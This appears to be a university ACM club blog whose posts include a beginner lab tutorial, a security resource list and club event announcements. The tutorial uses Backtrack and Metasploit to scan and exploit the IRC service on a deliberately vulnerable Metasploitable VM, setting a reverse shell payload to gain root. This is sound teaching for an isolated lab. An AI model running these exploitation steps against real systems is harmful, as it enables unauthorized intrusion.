Posted on February 6, 2013
Ever since I started studying Computer Science I have struggled to find a good way to differentiate it from mathematics. Mathematicians use computers. Mathematicians even write code. Computer scientists certainly prove things, well at least some of them. And they definitely use mathematics. So what is the difference?
I think today I found my answer. I was re-reading my data structures textbook for fun and found my answer. It was nestled in there between a discussion of selection sort and shell sort. Just a little musing by the author. The discussion was on lower bounded algorithms and how their analysis is difficult. Why is it difficult? For a computer scientist to prove all sorting algorithms are bounded below by big-omega of n-squared, on average with adjacent exchange of elements,would require running all of the possible algorithms of this kind.
If you try to do this you will fail, because there are infinitely many ways to do this ( some will argue). At least in theory there seems to be. I think you could verify it for a given time period because a lack of known possible technologies. So you could configure your hardware in a very large known possible number of ways, to get this finite approximation. However every time new technology is discovered, you would have to add to the possible permutations. But that’s not the point. (Just an aside).
The point is, a computer scientist is not satisfied until they actually run an experiment on a computer. In fact, they aren’t satisfied until they run a lot of experiments on a computer. Whereas for a mathematician, the proof is enough. The proof in fact, is the proof that something is true or not. Whereas the computer scientist requires physical results. This seems to me a curious fact.
I think this is why computer scientists refer to themselves as scientists, because CS is an experimental science. Mathematics is too, in the sense that both disciplines play with thought experiments. Mathematicians simply choose to do their thought experiments on paper, where as computer scientists prefer screens.
Today we will go through the talk I gave at the ACM club last semester. I will also be talking about some resources for you, the student interested in cyber security.
Today we will be talking about backtrack and metasploitable.
Backtrack: an operating system used to penetration test systems around the world.
metasploitable: an operating system that is vulnerable, on purpose, so you can understand how to attack stuff.
Backtrack is basically a ubuntu distribution with a bunch of cyber security tools tacked on. I recommend running backtrack through a VM rather than giving it a whole computer. While backtrack is pretty awesome, its still a specialized OS. If you are serious about security you should give it at least a 100 gigs of space. (You’ll need this for nexpose).
So let’s get started:
Today we are going to use backtrack to attack metasploitable. We could attack one of many, many vulnerabilities, but for convenience we will be exploiting the IRC vulnerability that comes with metasploitable.
So first you’ll need to download metasploitable and backtrack.
You can get a lot more packages at sourceforge that are exploitable. I highly recommend poking around and seeing what you can play with!!!
Alright, next you need virtual box (or some other virtualization software):
There are a lot of reasons why virtual box is awesome. However if we start getting into virtualization, we will probably never get to breaking into anything. You can look for other posts by me on virtualization in the near future.
Important note: Not all processors support virtualization, (most new CPU’s do). You can check this by running:
dmesg | less
look for statements like: “kvm: disabled by bios” and “kvm: no hardware support”
looking at the tutorial:
So once you have virtual box (what I am using) or your computer and you have downloaded the ISO files, you’ll need to install them.
You’ll need to do the following in virtualbox:
new->name: backtrack -> memory size: 1024 (just what I used) ->create a virtual hard drive now->VDI->fixed size-> 100 GB
Then you need to click on the newly created hard drive, hit the folder button, find the backtrack ISO and then hit start.
You’ll need to do the same thing for metasploitable.
Okay, now we are ready to do some hacking (almost).
Now we need to adjust some settings in our virtual machines.
Go into settings->network
You’ll need a host only adapter for both metasploitable and backtrack. MAKE SURE YOU DO NOT GIVE METASPLOITABLE A NAT ADAPTER!!!!
If you do this you will be giving a vulnerable operating system access to the internet. Doing this will mean your system is very easily compromisable. Essentially its like putting up a white flag, then running up to everyone that would want to kill you and asking them to shot you, with a very large gun, on the whole internet.
What you your system should look like at this point:
You should also have a metasploitable window that looks like this:
Once you start backtrack you will need to do the following:
hit enter at boot:
Then you will need to hit text-only mode (whatever the first option is)
And a backtrack window that looks like this:
Now just type in “startx” and you will get to a GUI.
If you want to do everything from the command line, you can, but i don’t recommend it.
Okay, so now we are going to get to the attacking part!!!!
I recommend going through each of the open ports in metasploitable, because attacking each service is good experience. Typically, non vulnerable machines will have at most 2 open ports. In the case of mac you won’t see any ( I tried this last night).
So first you will need to log into metasploitable, the username and password are: msfadmin
now run ifconfig
Notice the ip address: 192.168.56.102 , this is what we care about.
Now go into your backtrack VM
We will be running the command nmap -A -v 192.168.56.102 (This is the ip address of metasploitable in our example)
It is important to note that this maybe different on your machine. You should run ifconfig on the metasploitable vm to be sure.
If you ran nmap correctly, you should get a list of all the open ports on metasploitable, looks like 23 in all. (Quiet a bit of practice)
Each of the ports is a specific service, which has a networking protocol. Typically a service will always run over the same port. For instance port 80 is always http. (We can see its listed here)
This is how metasploit will know what services our target machine is running. (If we were attacking a real system we would scan for a whole bunch of ports, rather than just one.)
Now open a new terminal in backtrack and run
This is metasploit, the penetration testing framework.
now run the command search scanner
This will give you a listing of all the exploits available. Since we are going to attack IRC, we want to run:
Now all we need to do type:
Then type show options
then type set RHOST 192.168.56.102 (this is metasploitable’s IP address)
Then type show payloads
Then you need to set a payload using
set PAYLOAD generic/shell_reverse_tcp
Now we have to set our host ip address. For this run ifconfig in metasploit in a seperate window.
Now run set LHOST 192.168.56.101 (backtrack’s ip address in our example)
Now simply type exploit
if all went well, you should see the screen above, just type whoami
if you see root, then you got root access!!! (the holy grail of all cyber security challenges)
Now let’s talk about references.
This is a short list of I have compiled of ways to improve your skills as a cyber security expert:
http://isisblogs.poly.edu/ <- nyu-poly’s blog
This blog is home to some of the most badass hackers and cyber security experts I know. You can trust anything that is written here.
This is Dan Guido’s homepage. He is one of the most knowledgeable hackers I have ever heard lecture.
A great blog, filled with tutorials and interesting articles, I highly recommend this as a secondary source to the isis blog.
Where to get pretty much any security tool you could want, for free.
A decent description of cyber security terms
A series of lectures for those interested in the policy side of cyber security
A decent overview of cybersecurity topics
More policy things.
Government R&D website
Lots and lots of security videos (some of them you have to pay for)
An overview of tools by the us government.
the reverse engineering subreddit, need I say more?
Today will begin a series of posts on cyber security. I hope you will all enjoy these. I plan to update the blog with a new tutorial I’m working on at least once a week. Over the breaks probably many times a week.
So why should you care about cyber security? I would say there are as many reasons as their are examples of code on the internet, however its also because its a lot of fun. Cyber security can motivate much of the technical aspects of computer science and breathe life into it. Suddenly pointers, instructions sets, buffers, the stack, internet protocols, and much more are accessible and useful. The question no longer becomes, why do we need to learn this? High level languages like python do all of it for you. To, what can we cover next?
This is because you will understand how to exploit these constructs to solve a puzzle. The puzzle is usually, how do I get root access to this system? But it might be how do I get this piece of information? Or how do I get this machine to stop running without pressing the off button? Or how do I intercept this communication before it goes from point A to point B? Or many other interesting questions that require understanding of the internals of computational systems in a fundamental way.
In this first post, I want you to understand the skills a security professional needs. It should be understood that these skills are only requisite if you want deep mastery of computer science and cyber security. However these skills will come with time, they are not prerequisite to beginning your journey into deep mastery of cyber security and computer science.
So what will you know once you have an understanding of cyber security?
-C (the programming language)
-code auditing: reading large code bases easily ~3000+ lines
This is by no means an exhaustive list however most serious security professionals know these things incredibly well. I look forward to taking this journey with you all. Next up, an introduction to metasploit. Prerequisite knowledge – a primitive understanding of computer networking.
Hack Night is happening in t-minus 50 minutes in CIWW 311 (the ACM office!). We’ll be working with OpenCV, the pi, the Roomba, the MakerBot, and fielding questions relating to just about anything so swing by, hangout, and check out ALL THE THINGS!
Hope you all had a nice, relaxing break. Just a reminder that we’re having interview night (again) on Tuesday, March 20th, at 7pm in room 317. This is a great opportunity to learn some good techniques for CS interviews, learn what to expect from them, and get a little bit of practice with algorithm/logic questions. It’s a great opportunity if you think you might be working as a software engineer, even if you already have some experience. And we’ll have free food.
P.P.S. Unless noted otherwise, our meetings are in Courant (CIWW) at 251 Mercer Street, New York, NY
Posted on February 22, 2012
Let’s keep this blog short, so it might imitate a “tumblelog.”
Event: Derek Gottfrid (derekg.org), API lead at Tumblr, will give us an interesting tech talk about Tumblr
Date: February 27, 2012 Monday
Time: 5:30pm – 7:30pm
Location: Courant Institue Room 517
Address: 251 Mercer Street, New York
When: Tuesday, February 7th
Where: 251 Mercer St, Room 317
About the Talk
SecondMarket is continuously iterating and developing its platform for trading alternative assets. In this talk, find out from Michael Lysaght, SecondMarkets VP of Engineering, how its technology platform has gone through a number of major overhauls, the reasons for these changes and where we are today. Also Michael will discuss how software is built at SecondMarket using a blend of Test Driven Development, Agile and Scrum.
How We Work
SecondMarket’s technology team has 45 people and is located downtown in the heart of the financial district. Even though we operate in the financial markets, our goal is to dramatically change the way in which these markets work. At our core, we operate as a small technology startup. Our development teams are cross functional comprising of Engineers, Product Management, Interaction Designers and QA, all working together on the same product. Software is developed using short development cycles of two
weeks or less, so we experience the gratification of seeing our work in production quickly and often. We use industry best practices such as continuous integration and continuous deployment. Our culture is central to who we are. We encourage participation in the local NY community and we all share a passion for learning.
SecondMarket is the marketplace for alternative investments and an online destination to get market data, connect with other investors and transact in assets such as private company stock, fixed income, public equity and bankruptcy claims. SecondMarket makes it easier to transact in fragmented markets by connecting buyers and sellers in an online investment platform and providing the market and operations expertise to complete trades. Since the firm was founded in 2004, more than 75,000 individuals and institutions have signed up to SecondMarket and billions of dollars in alternative investment transactions have been completed.
Posted on January 26, 2012
Join NYU Poly’s Entrepreneurship and Innovation Association for their first event of the spring semester: Commercializing your idea! Hear start-up success stories from names like Fred Wilson of Union Square ventures, mingle with fellow entrepreneurs while you grub on delicious FREE food! EIA seeks to create an ecosystem that will build on NYU Poly’s i2e mission: providing students with the concepts of entrepreneurship, the benefits of self-employment, and the step-by-step path for launching and commercializing ideas.
When: February 10th, 4pm-6pm
Where: LC 400, @NYU Poly
Why: Because it will be awesome
For more information and to RSVP please email Polyentrepreneurs@gmail.com
ACM meetings are on every Tuesday nights at 7PM this semester. We planned lots of exciting nights for you. You can take a look at our tentative agenda at http://cs.nyu.edu/~acmweb/wordpress/?page_id=25. Besides, you can sign up our mailing list for updated information at http://bit.ly/acmatnyu. The first meeting will be next week, 31st January 2012. We are looking forward to seeing you!
Posted on April 5, 2011
1. An element of a culture or behavior that may be passed from one
individual to another by nongenetic means, esp. imitation.
Have you ever wondered where memes come from? Be prepared to take a
tour through the internet: the good, the bad, but mostly the ugly. The
gentlemen of memefactory will take you through /b/, the rules of the
internet, how to piss off Xzibit, how much power you need (hint: it’s
> 9000), what you should do when the low battery light comes on and
you’re busy (challenge accepted), how to save money, and more. There
will be pizza and soda, as usual. Don’t miss this one. Seriously.
We’ve been planning this all year.
Memefactory is Friday April 22nd at 8:30 pm in CIWW 109.
Posted on March 29, 2011
Like the video?
Just come to our weekly meetings.
The MakerBot and the EggBot are waiting for you =)
ACM @ NYU
Posted on March 22, 2011
Daniel Goddemeyer, an employee at IDEO will come in to meet us on 3/22 (first Tuesday back from break).
We will start at our usual 7 pm and would go for about an hour or so.
You will want to go to room 317 in Warren Weaver Hall (251 Mercer Street, New York NY).
What is IDEO? source: Wikipedia
IDEO is a design and innovation consultancy founded in Palo Alto, California, United States with other offices in San Francisco, Chicago, New York, Boston, London, Munich and Shanghai. The company helps design products, services, environments, and digital experiences. Additionally, the company has become increasingly involved in management consulting.
We will be having a meeting tomorrow (3/1) at 7 PM in CIWW 317. We will be working on both the 3D printer and Egg Bot, but the highlight of tomorrow will 3 more demos. They are:
Tengchao: Another implementation of SOLE that integrates the hash function of Blake, one of the SHA-3 finalists.
Andrew: Graphics, animation, and UI with Processing
Tamreen: Quick Introduction to Haskell
See you all there!
The ACM and ADI at Columbia, as well as the ACM and tech@NYU at NYU, are excited to present a new opportunity for undergraduate students interested in the interface of technology and entrepreneurship: HackNY.
HackNY.org works to federate NYC students with NYC startups by facilitating a summer internship program and by building a communit
y among the next generation of NYC hackers. Starting in 2010, the summer program includes pedagogical lectures as well as dinners with local and nonlocal upstarts, hackers, and founders.
All NYC students are invited to a 24-hour hackathon at NYU April 2-3, 7pm-7pm, and all NYC startups are invited to submit to demo their hot technologies, share their APIs and data, and impress NYC’s next generation of code powerhouses, many of whom will be looking for summer internships.
All students are invited to RSVP to email@example.com. Please include your full name, University, class year, and major.
All students including MS and PhD are welcome to join us!